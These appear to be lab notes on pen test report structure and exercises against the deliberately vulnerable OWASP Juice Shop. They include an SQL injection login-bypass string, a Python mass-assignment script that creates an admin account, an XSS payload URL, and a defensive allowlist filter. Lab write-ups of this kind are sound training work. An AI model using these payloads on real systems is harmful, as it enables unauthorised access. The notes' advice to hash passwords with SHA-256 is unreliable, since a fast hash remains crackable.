Pen_Test_Report_Analysis.md 04/07/2022
# Pen Test Report Analysis

## 1. Pen Test Report Structure
### EXECUTIVE SUMMARY

The Executive Summary, as its title already states, is a summary for higher management, so that they do not have to read the whole report with all its technical details. It is a synopsis of all important findings and the corresponding actions.
### NARRATIVE AND ACTIVITY LOG

The pentesting company explains the methodology and the scope of their work: what they did, what they did not do, and why. It is a nearly complete blueprint of their actions and also contains some findings.
### FINDINGS AND RECOMMENDATIONS

This section gives an outline of the findings and advice on the next steps to take.
### RISK RATINGS

The risk classifications are explained in more detail here so that the ratings used in the findings can be understood.
### FINDINGS SUMMARY

The findings are divided into critical, high, medium and low risks. Each rating is explained in detail, and there is also an overview of the risks.
### HIGH RISK FINDINGS

Here are all the high risk findings.

### MEDIUM RISK FINDINGS

Here are all the medium risk findings.

### LOW RISK FINDINGS

Here are all the low risk findings.

### STRATEGIC GUIDANCE

An outline of the actions the pentesting company would take based on the report.
## 2. Attacking the Juice Shop

```shell
docker pull bkimminich/juice-shop
docker run --rm -p 3000:3000 bkimminich/juice-shop
```
### 1. SQL Injection Flaws

1. The report suggests logging in with the parameters `‘ = OR 1=1--` as the username and any password. It no longer works as written in the script.
2. It works when you quote it and change it slightly:
   `' OR 1=1; --`
### 2. Authorization Bypass

```python
#!/usr/bin/python3
import requests

# Juice Shop instance started with the docker command above (container IP).
BASE_URL = 'http://172.17.0.2:3000'

# The registration endpoint copies the client-supplied fields into the new
# user record, so a "role" value sent by the client is stored as well.
r = requests.post(f'{BASE_URL}/api/Users/',
                  json={"email": "admin", "password": "admin", "role": "admin"})
print(f"Status Code: {r.status_code}, Response: {r.json()}")
```
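As an added example from the defender's side (not Juice Shop's own code and not taken from the report), this is a registration-input filter that closes the mass-assignment hole the script above exploits: only an allowlist of fields is copied from the request body and the role is always set server-side. The field names mirror the script's request; the `customer` default role and the sample payload are constructed assumptions.

```javascript
// Added example: allowlist-based handling of a self-registration body.
// Assumption: the handler receives the already-parsed JSON body of the
// POST /api/Users request; field names mirror the bypass script above.

const ALLOWED_REGISTRATION_FIELDS = new Set(['email', 'password']);
const DEFAULT_ROLE = 'customer'; // assumed default; never taken from the client

class ValidationError extends Error {}

function buildNewUser(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    throw new ValidationError('request body must be a JSON object');
  }
  // Copy only the fields a self-registering user may set; everything else
  // (including "role") is silently dropped instead of stored.
  const user = {};
  for (const key of Object.keys(body)) {
    if (ALLOWED_REGISTRATION_FIELDS.has(key)) user[key] = body[key];
  }
  if (typeof user.email !== 'string' || !/^[^@\s]+@[^@\s]+\.[^@\s]+$/.test(user.email)) {
    throw new ValidationError('invalid email');
  }
  if (typeof user.password !== 'string' || user.password.length < 8) {
    throw new ValidationError('password too short');
  }
  // Privileged attributes are decided by the server, whatever was submitted.
  user.role = DEFAULT_ROLE;
  return user;
}

// Detection hook: the keys that were submitted but not allowed. A request that
// tries to set "role" is worth logging as a probing attempt.
function ignoredFields(body) {
  if (body === null || typeof body !== 'object') return [];
  return Object.keys(body).filter((k) => !ALLOWED_REGISTRATION_FIELDS.has(k));
}

// Constructed sample payload in the shape sent by the bypass script.
const samplePayload = { email: 'attacker@example.com', password: 'admin123', role: 'admin' };

const created = buildNewUser(samplePayload);
console.log('stored user:', created, 'ignored:', ignoredFields(samplePayload));
```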
### 3. Cross-Site Scripting Flaws

The URL is sanitized, as the picture below shows:

```
http://172.17.0.2:3000/#/track-result?id=%3Ciframe%20src=%22javascript:alert(%60xss%60)%22%3E
```
### 4. Access to Encryption Keys
### 5. Broken Authentication

Look now at the broken authentication demo at https://demo.owasp-juice.shop/#/hacking-instructor?challenge=Password%20Strength and reflect on whether you want to strengthen the recommendation in the report. The MD5 hash is easily crackable with https://crackstation.net/, so a stronger hashing algorithm such as SHA-256 is needed.
## 3. Snyk

### 1. Cross-site Scripting (XSS)
Because it is of high severity and injection is in third place in the OWASP Top 10 2021 (A03:2021-Injection).
### 2. NoSQL Injection

Because it is of high severity and injection is in third place in the OWASP Top 10 2021 (A03:2021-Injection).
### 3. Regular Expression Denial of Service (ReDoS)

Because it is of high severity.
### 4. SQL Injection

Because it is of high severity and you can extract the database.
### 5. Code Injection

Because it is of high severity and can run code on the server and take over the whole host.
### 6. Hardcoded Secret

Because it is of high severity.
### 7. Server-Side Request Forgery (SSRF)

Because it is of high severity and in tenth place in the OWASP Top 10 2021 (A10:2021-Server-Side Request Forgery).